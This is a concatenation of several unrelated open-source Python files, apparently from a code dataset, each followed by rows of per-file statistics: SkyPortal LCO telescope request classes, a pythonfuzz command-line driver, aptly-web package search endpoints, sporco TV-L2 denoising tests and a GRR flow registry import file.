        """Submit a follow-up request to LCO's SPECTRAL.

        Parameters
        ----------
        request: skyportal.models.FollowupRequest
            The request to add to the queue and the SkyPortal database.
        """
        from ..models import FacilityTransaction, DBSession
        altdata = request.allocation.altdata
        if not altdata:
            raise ValueError('Missing allocation information.')
        lcoreq = SPECTRALRequest(request)
        requestgroup = lcoreq.requestgroup
        r = requests.post(
            requestpath,
            headers={"Authorization": f'Token {altdata["API_TOKEN"]}'},
            json=requestgroup,  # Make sure you use json!
        )
        # NOTE(review): raise_for_status() fires before the status check, so
        # the 'rejected' branch below is only reachable for non-201 success
        # codes; 4xx/5xx propagate as exceptions — confirm this is intended.
        r.raise_for_status()
        if r.status_code == 201:
            request.status = 'submitted'
        else:
            request.status = f'rejected: {r.content}'
        transaction = FacilityTransaction(
            request=http.serialize_requests_request(r.request),
            response=http.serialize_requests_response(r),
            followup_request=request,
            initiator_id=request.last_modified_by_id,
        )
        DBSession().add(transaction)
    # JSON schema driving the follow-up request form.
    # NOTE: the date defaults are evaluated once at import time, not per view.
    form_json_schema = {
        "type": "object",
        "properties": {
            "observation_choices": {
                "type": "array",
                "title": "Desired Observations",
                "items": {"type": "string", "enum": ["gp", "rp", "ip", "zs", "Y"]},
                "uniqueItems": True,
                "minItems": 1,
            },
            "exposure_time": {
                "title": "Exposure Time [s]",
                "type": "number",
                "default": 300.0,
            },
            "exposure_counts": {
                "title": "Exposure Counts",
                "type": "number",
                "default": 1,
            },
            "start_date": {
                "type": "string",
                "format": "date",
                "default": datetime.utcnow().date().isoformat(),
                "title": "Start Date (UT)",
            },
            "end_date": {
                "type": "string",
                "format": "date",
                "title": "End Date (UT)",
                "default": (datetime.utcnow().date() + timedelta(days=7)).isoformat(),
            },
            "maximum_airmass": {
                "title": "Maximum Airmass (1-3)",
                "type": "number",
                "default": 2.0,
                "minimum": 1,
                "maximum": 3,
            },
            "minimum_lunar_distance": {
                # Fixed label: this field is the lunar-distance constraint,
                # not a seeing limit (previous title was a copy-paste error).
                "title": "Minimum Lunar Distance [deg] (0-180)",
                "type": "number",
                "default": 30.0,
                "minimum": 0,
                "maximum": 180,
            },
            "priority": {
                "title": "IPP (0-2)",
                "type": "number",
                "default": 1.0,
                "minimum": 0,
                "maximum": 2,
            },
        },
        "required": [
            "start_date",
            "end_date",
            "maximum_airmass",
            "minimum_lunar_distance",
            "priority",
        ],
    }
    ui_json_schema = {"observation_choices": {"ui:widget": "checkboxes"}}
class MUSCATAPI(LCOAPI):
    """An interface to LCO MUSCAT operations."""
    # subclasses *must* implement the method below
    @staticmethod
    def submit(request):
        """Submit a follow-up request to LCO's MUSCAT.

        Parameters
        ----------
        request: skyportal.models.FollowupRequest
            The request to add to the queue and the SkyPortal database.
        """
        from ..models import FacilityTransaction, DBSession
        altdata = request.allocation.altdata
        if not altdata:
            raise ValueError('Missing allocation information.')
        lcoreq = MUSCATRequest(request)
        requestgroup = lcoreq.requestgroup
        r = requests.post(
            requestpath,
            headers={"Authorization": f'Token {altdata["API_TOKEN"]}'},
            json=requestgroup,  # Make sure you use json!
        )
        # NOTE(review): raise_for_status() fires before the status check, so
        # the 'rejected' branch below is only reachable for non-201 success
        # codes; 4xx/5xx propagate as exceptions — confirm this is intended.
        r.raise_for_status()
        if r.status_code == 201:
            request.status = 'submitted'
        else:
            request.status = f'rejected: {r.content}'
        transaction = FacilityTransaction(
            request=http.serialize_requests_request(r.request),
            response=http.serialize_requests_response(r),
            followup_request=request,
            initiator_id=request.last_modified_by_id,
        )
        DBSession().add(transaction)
    # JSON schema driving the follow-up request form.
    # NOTE: the date defaults are evaluated once at import time, not per view.
    form_json_schema = {
        "type": "object",
        "properties": {
            "exposure_time": {
                "title": "Exposure Time [s]",
                "type": "number",
                "default": 300.0,
            },
            "exposure_counts": {
                "title": "Exposure Counts",
                "type": "number",
                "default": 1,
            },
            "start_date": {
                "type": "string",
                "format": "date",
                "default": datetime.utcnow().date().isoformat(),
                "title": "Start Date (UT)",
            },
            "end_date": {
                "type": "string",
                "format": "date",
                "title": "End Date (UT)",
                "default": (datetime.utcnow().date() + timedelta(days=7)).isoformat(),
            },
            "maximum_airmass": {
                "title": "Maximum Airmass (1-3)",
                "type": "number",
                "default": 2.0,
                "minimum": 1,
                "maximum": 3,
            },
            "minimum_lunar_distance": {
                # Fixed label: this field is the lunar-distance constraint,
                # not a seeing limit (previous title was a copy-paste error).
                "title": "Minimum Lunar Distance [deg] (0-180)",
                "type": "number",
                "default": 30.0,
                "minimum": 0,
                "maximum": 180,
            },
            "priority": {
                "title": "IPP (0-2)",
                "type": "number",
                "default": 1.0,
                "minimum": 0,
                "maximum": 2,
            },
        },
        "required": [
            "start_date",
            "end_date",
            "maximum_airmass",
            "minimum_lunar_distance",
            "priority",
        ],
    }
    ui_json_schema = {}
class FLOYDSAPI(LCOAPI):
    """An interface to LCO FLOYDS operations."""
    # subclasses *must* implement the method below
    @staticmethod
    def submit(request):
        """Submit a follow-up request to LCO's FLOYDS.

        Parameters
        ----------
        request: skyportal.models.FollowupRequest
            The request to add to the queue and the SkyPortal database.
        """
        from ..models import FacilityTransaction, DBSession
        altdata = request.allocation.altdata
        if not altdata:
            raise ValueError('Missing allocation information.')
        lcoreq = FLOYDSRequest(request)
        requestgroup = lcoreq.requestgroup
        r = requests.post(
            requestpath,
            headers={"Authorization": f'Token {altdata["API_TOKEN"]}'},
            json=requestgroup,  # Make sure you use json!
        )
        # NOTE(review): raise_for_status() fires before the status check, so
        # the 'rejected' branch below is only reachable for non-201 success
        # codes; 4xx/5xx propagate as exceptions — confirm this is intended.
        r.raise_for_status()
        if r.status_code == 201:
            request.status = 'submitted'
        else:
            request.status = f'rejected: {r.content}'
        transaction = FacilityTransaction(
            request=http.serialize_requests_request(r.request),
            response=http.serialize_requests_response(r),
            followup_request=request,
            initiator_id=request.last_modified_by_id,
        )
        DBSession().add(transaction)
    # JSON schema driving the follow-up request form.
    # NOTE: the date defaults are evaluated once at import time, not per view.
    form_json_schema = {
        "type": "object",
        "properties": {
            "exposure_time": {
                "title": "Exposure Time [s]",
                "type": "number",
                "default": 300.0,
            },
            "exposure_counts": {
                "title": "Exposure Counts",
                "type": "number",
                "default": 1,
            },
            "start_date": {
                "type": "string",
                "format": "date",
                "default": datetime.utcnow().date().isoformat(),
                "title": "Start Date (UT)",
            },
            "end_date": {
                "type": "string",
                "format": "date",
                "title": "End Date (UT)",
                "default": (datetime.utcnow().date() + timedelta(days=7)).isoformat(),
            },
            "maximum_airmass": {
                "title": "Maximum Airmass (1-3)",
                "type": "number",
                "default": 2.0,
                "minimum": 1,
                "maximum": 3,
            },
            "minimum_lunar_distance": {
                # Fixed label: this field is the lunar-distance constraint,
                # not a seeing limit (previous title was a copy-paste error).
                "title": "Minimum Lunar Distance [deg] (0-180)",
                "type": "number",
                "default": 30.0,
                "minimum": 0,
                "maximum": 180,
            },
            "priority": {
                "title": "IPP (0-2)",
                "type": "number",
                "default": 1.0,
                "minimum": 0,
                "maximum": 2,
            },
        },
        "required": [
            "start_date",
            "end_date",
            "maximum_airmass",
            "minimum_lunar_distance",
            "priority",
        ],
    }
    ui_json_schema = {}
| 30.36302
| 107
| 0.479228
| 2,565
| 31,365
| 5.726316
| 0.106823
| 0.031454
| 0.023148
| 0.030501
| 0.916326
| 0.907612
| 0.89134
| 0.89134
| 0.887187
| 0.887187
| 0
| 0.013587
| 0.399267
| 31,365
| 1,032
| 108
| 30.392442
| 0.765948
| 0.133301
| 0
| 0.767832
| 0
| 0.001399
| 0.226978
| 0.018608
| 0
| 0
| 0
| 0
| 0
| 1
| 0.01958
| false
| 0
| 0.016783
| 0
| 0.067133
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
490a49a5edd6ecbbed644c8bc070e14c25355983
| 4,569
|
py
|
Python
|
pythonfuzz/main.py
|
MJ-SEO/py_fuzz
|
789fbfea21bf644ba4d00554fe4141694b0a190a
|
[
"Apache-2.0"
] | null | null | null |
pythonfuzz/main.py
|
MJ-SEO/py_fuzz
|
789fbfea21bf644ba4d00554fe4141694b0a190a
|
[
"Apache-2.0"
] | null | null | null |
pythonfuzz/main.py
|
MJ-SEO/py_fuzz
|
789fbfea21bf644ba4d00554fe4141694b0a190a
|
[
"Apache-2.0"
] | null | null | null |
import argparse
from re import S
from pythonfuzz import fuzzer
class PythonFuzz(object):
    """Decorator that turns a fuzz target into a CLI fuzzing entry point.

    Usage::

        @PythonFuzz
        def fuzz(buf):
            ...

        fuzz()  # parses sys.argv and starts the fuzzing loop
    """

    def __init__(self, func):
        # The fuzz target; invoked by the fuzzer once per generated input.
        self.function = func

    def __call__(self, *args, **kwargs):
        """Parse command-line options and run ``fuzzer.Fuzzer``.

        Blocks for the whole fuzzing run; does not return a value.
        """
        parser = argparse.ArgumentParser(
            description='Coverage-guided fuzzer for python packages')
        parser.add_argument(
            'dirs', type=str, nargs='*',
            help="one or more directories/files to use as seed corpus. the first directory will be used to save the generated test-cases")
        parser.add_argument('--exact-artifact-path', type=str,
                            help='set exact artifact path for crashes/ooms')
        # BUG FIX: argparse's type=bool converts ANY non-empty string --
        # including "False" -- to True. Parse the value explicitly so
        # "--regression False" really disables regression mode, while
        # "--regression True" keeps working as before.
        parser.add_argument('--regression',
                            type=lambda v: str(v).lower() in ('1', 'true', 'yes'),
                            default=False,
                            help='run the fuzzer through set of files for regression or reproduction')
        parser.add_argument('--rss-limit-mb', type=int, default=4096,
                            help='Memory usage in MB')
        parser.add_argument('--max-input-size', type=int, default=4096,
                            help='Max input size in bytes')
        parser.add_argument('--dict', type=str, help='dictionary file')
        parser.add_argument('--close-fd-mask', type=int, default=0,
                            help='Indicate output streams to close at startup')
        parser.add_argument('--runs', type=int, default=-1,
                            help='Number of individual test runs, -1 (the default) to run indefinitely.')
        # Typo fixes in user-facing help text below ('then'->'than',
        # 'wherter'->'whether', 'runing'->'running', 'schduler'->'scheduler').
        parser.add_argument('--timeout', type=int, default=5,
                            help='If input takes longer than this timeout the process is treated as failure case')
        parser.add_argument('--inf-run', default=False, action='store_true',
                            help='Decide whether the fuzzing stops or keeps running after it finds a failure')  # added
        parser.add_argument('--sched', type=str, default=None,
                            help='Decide the scheduler of fuzzing')  # added
        args = parser.parse_args()
        f = fuzzer.Fuzzer(self.function, args.dirs, args.exact_artifact_path,
                          args.rss_limit_mb, args.timeout, args.regression,
                          args.max_input_size, args.close_fd_mask, args.runs,
                          args.dict, args.inf_run, args.sched)  # , self._fname)
        f.start()
class PythonFuzzFile(object):
    """File-based variant of :class:`PythonFuzz`.

    Passes a working file name (``--fname``, default ``"tempfile"``) to the
    fuzzer instead of a scheduler argument.
    """

    def __init__(self, func):
        # The fuzz target; invoked by the fuzzer once per generated input.
        self.function = func
        # Default working file name; may be overridden via --fname.
        self._fname = "tempfile"

    def _fuzzfile(self):
        """Return the working file name used by the driver."""
        return self._fname

    def __call__(self, *args, **kwargs):
        """Parse command-line options and run ``fuzzer.Fuzzer``.

        Blocks for the whole fuzzing run; does not return a value.
        """
        parser = argparse.ArgumentParser(
            description='Coverage-guided fuzzer for python packages')
        parser.add_argument(
            'dirs', type=str, nargs='*',
            help="one or more directories/files to use as seed corpus. the first directory will be used to save the generated test-cases")
        parser.add_argument('--exact-artifact-path', type=str,
                            help='set exact artifact path for crashes/ooms')
        # BUG FIX: argparse's type=bool converts ANY non-empty string --
        # including "False" -- to True. Parse the value explicitly so
        # "--regression False" really disables regression mode.
        parser.add_argument('--regression',
                            type=lambda v: str(v).lower() in ('1', 'true', 'yes'),
                            default=False,
                            help='run the fuzzer through set of files for regression or reproduction')
        parser.add_argument('--rss-limit-mb', type=int, default=4096,
                            help='Memory usage in MB')
        parser.add_argument('--max-input-size', type=int, default=4096,
                            help='Max input size in bytes')
        parser.add_argument('--dict', type=str, help='dictionary file')
        parser.add_argument('--close-fd-mask', type=int, default=0,
                            help='Indicate output streams to close at startup')
        parser.add_argument('--runs', type=int, default=-1,
                            help='Number of individual test runs, -1 (the default) to run indefinitely.')
        # Typo fixes in user-facing help text below ('then'->'than',
        # 'wherter'->'whether', 'runing'->'running').
        parser.add_argument('--timeout', type=int, default=5,
                            help='If input takes longer than this timeout the process is treated as failure case')
        parser.add_argument('--inf-run', default=False, action='store_true',
                            help='Decide whether the fuzzing stops or keeps running after it finds a failure')  # added
        parser.add_argument('--fname', type=str, default=None,
                            help='Specific file name for PythonfuzzFile driver')  # added
        args = parser.parse_args()
        if args.fname:
            self._fname = args.fname
        print("MAIN fname: ", self._fname)
        f = fuzzer.Fuzzer(self.function, args.dirs, args.exact_artifact_path,
                          args.rss_limit_mb, args.timeout, args.regression,
                          args.max_input_size, args.close_fd_mask, args.runs,
                          args.dict, args.inf_run, self._fname)
        f.start()
# Commented-out example of decorating a target with @PythonFuzz.
'''
@PythonFuzz
def PythonfuzzFile():
    pass
'''

# NOTE(review): PythonFuzz.__init__ requires a target function, so this bare
# call raises TypeError at runtime. Presumably a placeholder entry point
# (see the commented-out decorator example above) -- confirm intent.
if __name__ == '__main__':
    PythonFuzz()
| 55.048193
| 164
| 0.640403
| 590
| 4,569
| 4.832203
| 0.235593
| 0.069449
| 0.131182
| 0.025254
| 0.876885
| 0.844616
| 0.844616
| 0.844616
| 0.81866
| 0.81866
| 0
| 0.006946
| 0.243817
| 4,569
| 82
| 165
| 55.719512
| 0.818234
| 0.008098
| 0
| 0.730159
| 0
| 0.031746
| 0.341376
| 0.009383
| 0
| 0
| 0
| 0
| 0
| 1
| 0.079365
| false
| 0
| 0.047619
| 0.015873
| 0.174603
| 0.015873
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
491c98531bbdc0a047056b339097a2cbf3a02974
| 1,913
|
py
|
Python
|
aptlyweb/resources/package_search.py
|
istarion/aptly-web
|
6e782f7050b61e34d67a76fe1cc171d5db415d36
|
[
"Apache-2.0"
] | null | null | null |
aptlyweb/resources/package_search.py
|
istarion/aptly-web
|
6e782f7050b61e34d67a76fe1cc171d5db415d36
|
[
"Apache-2.0"
] | 1
|
2018-04-10T14:02:35.000Z
|
2018-04-14T17:30:27.000Z
|
aptlyweb/resources/package_search.py
|
istarion/aptly-web
|
6e782f7050b61e34d67a76fe1cc171d5db415d36
|
[
"Apache-2.0"
] | null | null | null |
from flask_restful import Resource, reqparse
from flask_restful import abort
from aptlyweb.resources import pyptly_api
from flask_security import login_required
class PackageSearch(Resource):
    """Search packages by a name fragment across local repos and snapshots.

    Returns a list of dicts, one per container that had at least one match:
    ``{"container_type", "container_name", "packages"}``.
    """

    @staticmethod
    @login_required
    def get(query):
        # Substring match on the package name, in aptly's query syntax.
        name_query = "Name (~ .*{QUERY}.*)".format(QUERY=query)
        matches = []
        # NOTE(review): get_local_repos is referenced without parentheses,
        # unlike get_snapshots() below -- confirm it is a property/list.
        for rep in pyptly_api.get_local_repos:
            found = pyptly_api.show_repo_packages(rep["Name"], q=name_query)
            if found:
                matches.append({
                    "container_type": "Repository",
                    "container_name": rep["Name"],
                    "packages": found,
                })
        for snap in pyptly_api.get_snapshots():
            found = pyptly_api.show_snapshot_packages(snap["Name"], q=name_query)
            if found:
                matches.append({
                    "container_type": "Snapshot",
                    "container_name": snap["Name"],
                    "packages": found,
                })
        return matches
class PackageAdvancedSearch(Resource):
    """Search packages using a raw aptly package query string.

    Same response shape as PackageSearch, but ``query`` is passed through
    verbatim instead of being wrapped in a name-substring pattern.
    """

    @staticmethod
    @login_required
    def get(query):
        matches = []
        # NOTE(review): get_local_repos is referenced without parentheses,
        # unlike get_snapshots() below -- confirm it is a property/list.
        for rep in pyptly_api.get_local_repos:
            found = pyptly_api.show_repo_packages(rep["Name"], q=query)
            if found:
                matches.append({
                    "container_type": "Repository",
                    "container_name": rep["Name"],
                    "packages": found,
                })
        for snap in pyptly_api.get_snapshots():
            found = pyptly_api.show_snapshot_packages(snap["Name"], q=query)
            if found:
                matches.append({
                    "container_type": "Snapshot",
                    "container_name": snap["Name"],
                    "packages": found,
                })
        return matches
| 34.781818
| 118
| 0.544694
| 189
| 1,913
| 5.253968
| 0.227513
| 0.081571
| 0.04431
| 0.056395
| 0.817724
| 0.817724
| 0.817724
| 0.817724
| 0.777442
| 0.777442
| 0
| 0
| 0.351803
| 1,913
| 54
| 119
| 35.425926
| 0.800806
| 0
| 0
| 0.791667
| 0
| 0
| 0.13173
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.041667
| false
| 0
| 0.083333
| 0
| 0.208333
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
4927b145c69cb0354b732eeb78976ba4a56e3751
| 5,778
|
py
|
Python
|
tests/admm/test_tvl2.py
|
manvhah/sporco
|
9237d7fc37e75089a2a65ebfe02b7491410da7d4
|
[
"BSD-3-Clause"
] | 1
|
2019-07-23T11:27:41.000Z
|
2019-07-23T11:27:41.000Z
|
tests/admm/test_tvl2.py
|
wxwoods/sporco
|
7b0eefea8b6c720ab9a4998a7c55237445765738
|
[
"BSD-3-Clause"
] | null | null | null |
tests/admm/test_tvl2.py
|
wxwoods/sporco
|
7b0eefea8b6c720ab9a4998a7c55237445765738
|
[
"BSD-3-Clause"
] | null | null | null |
from __future__ import division
from builtins import object
from past.utils import old_div
import numpy as np
from sporco.admm import tvl2
import sporco.metric as sm
class TestSet01(object):
    """Smoke and dtype tests for tvl2.TVL2Denoise / tvl2.TVL2Deconv."""

    def setup_method(self, method):
        # Fixed seed so every test sees the same 16x15 random input.
        np.random.seed(12345)
        self.D = np.random.randn(16, 15)

    def test_01(self):
        # TVL2Denoise with default options should run without raising.
        lmbda = 3
        try:
            b = tvl2.TVL2Denoise(self.D, lmbda)
            b.solve()
        except Exception as e:
            print(e)
            assert 0

    def test_02(self):
        # TVL2Deconv with an identity (1x1 ones) kernel should run without raising.
        lmbda = 3
        try:
            b = tvl2.TVL2Deconv(np.ones((1, 1)), self.D, lmbda)
            b.solve()
        except Exception as e:
            print(e)
            assert 0

    def test_03(self):
        # Denoise: requested DataType must propagate to X, Y and U (float16).
        lmbda = 3
        dt = np.float16
        opt = tvl2.TVL2Denoise.Options({'Verbose': False, 'MaxMainIter': 20,
                                        'AutoRho': {'Enabled': True}, 'DataType': dt})
        b = tvl2.TVL2Denoise(self.D, lmbda, opt=opt)
        b.solve()
        assert b.X.dtype == dt
        assert b.Y.dtype == dt
        assert b.U.dtype == dt

    def test_04(self):
        # Denoise: dtype propagation for float32.
        lmbda = 3
        dt = np.float32
        opt = tvl2.TVL2Denoise.Options({'Verbose': False, 'MaxMainIter': 20,
                                        'AutoRho': {'Enabled': True}, 'DataType': dt})
        b = tvl2.TVL2Denoise(self.D, lmbda, opt=opt)
        b.solve()
        assert b.X.dtype == dt
        assert b.Y.dtype == dt
        assert b.U.dtype == dt

    def test_05(self):
        # Denoise: dtype propagation for float64.
        lmbda = 3
        dt = np.float64
        opt = tvl2.TVL2Denoise.Options({'Verbose': False, 'MaxMainIter': 20,
                                        'AutoRho': {'Enabled': True}, 'DataType': dt})
        b = tvl2.TVL2Denoise(self.D, lmbda, opt=opt)
        b.solve()
        assert b.X.dtype == dt
        assert b.Y.dtype == dt
        assert b.U.dtype == dt

    def test_06(self):
        # Deconv: dtype propagation for float32.
        lmbda = 3
        dt = np.float32
        opt = tvl2.TVL2Deconv.Options({'Verbose': False, 'MaxMainIter': 20,
                                       'AutoRho': {'Enabled': True}, 'DataType': dt})
        b = tvl2.TVL2Deconv(np.ones((1, 1)), self.D, lmbda, opt=opt)
        b.solve()
        assert b.X.dtype == dt
        assert b.Y.dtype == dt
        assert b.U.dtype == dt

    def test_07(self):
        # Deconv: dtype propagation for float64.
        lmbda = 3
        dt = np.float64
        opt = tvl2.TVL2Deconv.Options({'Verbose': False, 'MaxMainIter': 20,
                                       'AutoRho': {'Enabled': True}, 'DataType': dt})
        b = tvl2.TVL2Deconv(np.ones((1, 1)), self.D, lmbda, opt=opt)
        b.solve()
        assert b.X.dtype == dt
        assert b.Y.dtype == dt
        assert b.U.dtype == dt
class TestSet02(object):
    """Regression tests on a 2-D piecewise-constant image plus noise.

    The pinned ObjFun values depend on the exact sequence of random draws
    after np.random.seed, so statement order here is behavior-critical.
    """

    def setup_method(self, method):
        np.random.seed(12345)
        N = 64
        # Ground truth: +1 everywhere, -1 on the left half of each row.
        self.U = np.ones((N, N))
        self.U[:, 0:(old_div(N, 2))] = -1
        # Additive Gaussian noise with 0.1 standard deviation.
        self.V = 1e-1 * np.random.randn(N, N)
        self.D = self.U + self.V

    def test_01(self):
        # Denoise: final objective pinned to a known-good run, and the
        # reconstruction must be close (MSE < 1e-3) to the clean image.
        lmbda = 1e-1
        opt = tvl2.TVL2Denoise.Options({'Verbose': False, 'gEvalY': False,
                                        'MaxMainIter': 300, 'rho': 75*lmbda})
        b = tvl2.TVL2Denoise(self.D, lmbda, opt)
        X = b.solve()
        assert np.abs(b.itstat[-1].ObjFun - 32.875710674129564) < 1e-3
        assert sm.mse(self.U, X) < 1e-3

    def test_02(self):
        # Deconv with an identity kernel reduces to denoising; pinned objective.
        lmbda = 1e-1
        opt = tvl2.TVL2Deconv.Options({'Verbose': False, 'gEvalY': False,
                                       'MaxMainIter': 250})
        b = tvl2.TVL2Deconv(np.ones((1)), self.D, lmbda, opt)
        X = b.solve()
        assert np.abs(b.itstat[-1].ObjFun - 45.45958573088) < 1e-3
        assert sm.mse(self.U, X) < 1e-3
class TestSet03(object):
    """Regression tests on a 3-D volume, regularizing only axes (0, 1).

    Pinned ObjFun values depend on the exact random-draw order in
    setup_method; do not reorder statements.
    """

    def setup_method(self, method):
        np.random.seed(12345)
        N = 32
        # Ground truth: +1 everywhere, -1 on half of axis 1.
        self.U = np.ones((N, N, N))
        self.U[:, 0:(old_div(N, 2)), :] = -1
        # Additive Gaussian noise with 0.1 standard deviation.
        self.V = 1e-1 * np.random.randn(N, N, N)
        self.D = self.U + self.V

    def test_01(self):
        # Denoise over axes (0, 1) only; pinned objective + reconstruction MSE.
        lmbda = 1e-1
        opt = tvl2.TVL2Denoise.Options({'Verbose': False, 'gEvalY': False,
                                        'MaxMainIter': 250, 'rho': 10*lmbda})
        b = tvl2.TVL2Denoise(self.D, lmbda, opt, axes=(0, 1))
        X = b.solve()
        assert np.abs(b.itstat[-1].ObjFun - 363.0802047) < 1e-3
        assert sm.mse(self.U, X) < 1e-3

    def test_02(self):
        # Deconv (identity kernel) over axes (0, 1); pinned objective.
        lmbda = 1e-1
        opt = tvl2.TVL2Deconv.Options({'Verbose': False, 'gEvalY': False,
                                       'MaxMainIter': 250})
        b = tvl2.TVL2Deconv(np.ones((1)), self.D, lmbda, opt, axes=(0, 1))
        X = b.solve()
        assert np.abs(b.itstat[-1].ObjFun - 564.1586542) < 1e-3
        assert sm.mse(self.U, X) < 1e-3
class TestSet04(object):
    """Regression tests on a 3-D volume, regularizing all axes (0, 1, 2).

    Same fixture as TestSet03; only the `axes` argument differs. Pinned
    ObjFun values depend on the exact random-draw order in setup_method.
    """

    def setup_method(self, method):
        np.random.seed(12345)
        N = 32
        # Ground truth: +1 everywhere, -1 on half of axis 1.
        self.U = np.ones((N, N, N))
        self.U[:, 0:(old_div(N, 2)), :] = -1
        # Additive Gaussian noise with 0.1 standard deviation.
        self.V = 1e-1 * np.random.randn(N, N, N)
        self.D = self.U + self.V

    def test_01(self):
        # Denoise over all three axes; pinned objective + reconstruction MSE.
        lmbda = 1e-1
        opt = tvl2.TVL2Denoise.Options({'Verbose': False, 'gEvalY': False,
                                        'MaxMainIter': 250, 'rho': 10*lmbda})
        b = tvl2.TVL2Denoise(self.D, lmbda, opt, axes=(0, 1, 2))
        X = b.solve()
        assert np.abs(b.itstat[-1].ObjFun - 366.04267554965134) < 1e-3
        assert sm.mse(self.U, X) < 1e-3

    def test_02(self):
        # Deconv (identity kernel) over all three axes; pinned objective.
        lmbda = 1e-1
        opt = tvl2.TVL2Deconv.Options({'Verbose': False, 'gEvalY': False,
                                       'MaxMainIter': 250})
        b = tvl2.TVL2Deconv(np.ones((1)), self.D, lmbda, opt, axes=(0, 1, 2))
        X = b.solve()
        assert np.abs(b.itstat[-1].ObjFun - 567.72425227) < 1e-3
        assert sm.mse(self.U, X) < 1e-3
| 29.479592
| 77
| 0.507269
| 781
| 5,778
| 3.720871
| 0.131882
| 0.02925
| 0.044735
| 0.049209
| 0.894357
| 0.885754
| 0.867515
| 0.867515
| 0.831383
| 0.831383
| 0
| 0.084012
| 0.340775
| 5,778
| 195
| 78
| 29.630769
| 0.678918
| 0
| 0
| 0.756757
| 0
| 0
| 0.061094
| 0
| 0
| 0
| 0
| 0
| 0.195946
| 1
| 0.114865
| false
| 0
| 0.040541
| 0
| 0.182432
| 0.013514
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
494c29b16772dd8e396d491f7bc2ec6f59d4bbad
| 1,643
|
py
|
Python
|
grr/server/grr_response_server/flows/general/registry_init.py
|
Onager/grr
|
646196bbfb332e4cb546b6d0fe1c09b57c675f7d
|
[
"Apache-2.0"
] | null | null | null |
grr/server/grr_response_server/flows/general/registry_init.py
|
Onager/grr
|
646196bbfb332e4cb546b6d0fe1c09b57c675f7d
|
[
"Apache-2.0"
] | null | null | null |
grr/server/grr_response_server/flows/general/registry_init.py
|
Onager/grr
|
646196bbfb332e4cb546b6d0fe1c09b57c675f7d
|
[
"Apache-2.0"
] | null | null | null |
#!/usr/bin/env python
"""Load all flows so that they are visible in the registry.
"""
# pylint: disable=unused-import
# These imports populate the Flow registry
from grr.server.grr_response_server.flows.general import administrative
from grr.server.grr_response_server.flows.general import artifact_fallbacks
from grr.server.grr_response_server.flows.general import audit
from grr.server.grr_response_server.flows.general import ca_enroller
from grr.server.grr_response_server.flows.general import checks
from grr.server.grr_response_server.flows.general import collectors
from grr.server.grr_response_server.flows.general import discovery
from grr.server.grr_response_server.flows.general import export
from grr.server.grr_response_server.flows.general import file_finder
from grr.server.grr_response_server.flows.general import filesystem
from grr.server.grr_response_server.flows.general import filetypes
from grr.server.grr_response_server.flows.general import find
from grr.server.grr_response_server.flows.general import fingerprint
from grr.server.grr_response_server.flows.general import hardware
from grr.server.grr_response_server.flows.general import memory
from grr.server.grr_response_server.flows.general import network
from grr.server.grr_response_server.flows.general import processes
from grr.server.grr_response_server.flows.general import registry
from grr.server.grr_response_server.flows.general import transfer
from grr.server.grr_response_server.flows.general import webhistory
from grr.server.grr_response_server.flows.general import windows_vsc
from grr.server.grr_response_server.flows.general import yara_flows
| 49.787879
| 75
| 0.864881
| 250
| 1,643
| 5.488
| 0.212
| 0.112245
| 0.208455
| 0.25656
| 0.781341
| 0.781341
| 0.781341
| 0.781341
| 0.781341
| 0.081633
| 0
| 0
| 0.071211
| 1,643
| 32
| 76
| 51.34375
| 0.899083
| 0.090079
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0.045455
| 0
| 0
| 0
| null | 0
| 1
| 1
| 0
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 9
|
49543776833869fefe4d774fed23db632f5a4f79
| 21,918
|
py
|
Python
|
hybridbackend/tensorflow/feature_column/dense_features_test.py
|
fuhailin/HybridBackend
|
113383c5870b7180fa67c194208a27f76bdbf3f0
|
[
"Apache-2.0"
] | 38
|
2021-12-01T06:54:36.000Z
|
2022-03-23T11:23:21.000Z
|
hybridbackend/tensorflow/feature_column/dense_features_test.py
|
fuhailin/HybridBackend
|
113383c5870b7180fa67c194208a27f76bdbf3f0
|
[
"Apache-2.0"
] | 15
|
2021-12-01T09:15:26.000Z
|
2022-03-28T02:49:21.000Z
|
hybridbackend/tensorflow/feature_column/dense_features_test.py
|
fuhailin/HybridBackend
|
113383c5870b7180fa67c194208a27f76bdbf3f0
|
[
"Apache-2.0"
] | 8
|
2021-12-02T01:16:14.000Z
|
2022-01-28T04:51:16.000Z
|
# Copyright 2021 Alibaba Group Holding Limited. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# =============================================================================
r'''Tests for embedding columns.
'''
from __future__ import absolute_import
